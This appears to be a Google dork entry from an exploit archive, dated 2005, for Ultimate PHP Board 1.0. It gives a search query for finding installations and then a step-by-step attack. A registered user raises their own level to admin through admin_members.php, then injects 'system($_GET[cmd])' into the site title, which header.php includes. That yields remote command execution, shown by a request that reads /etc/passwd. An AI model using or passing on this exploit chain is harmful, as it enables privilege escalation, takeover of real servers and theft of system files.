"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)

  • 日期:2005-11-25
  • 类别:
  • 作者:anonymous
  • 语法:"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)
  • dork: "Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board"; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " now in config.dat we have: ... $title="Ultimate PHP Board "; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " "; ... in header.php we have: ... include "./db/config.dat"; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd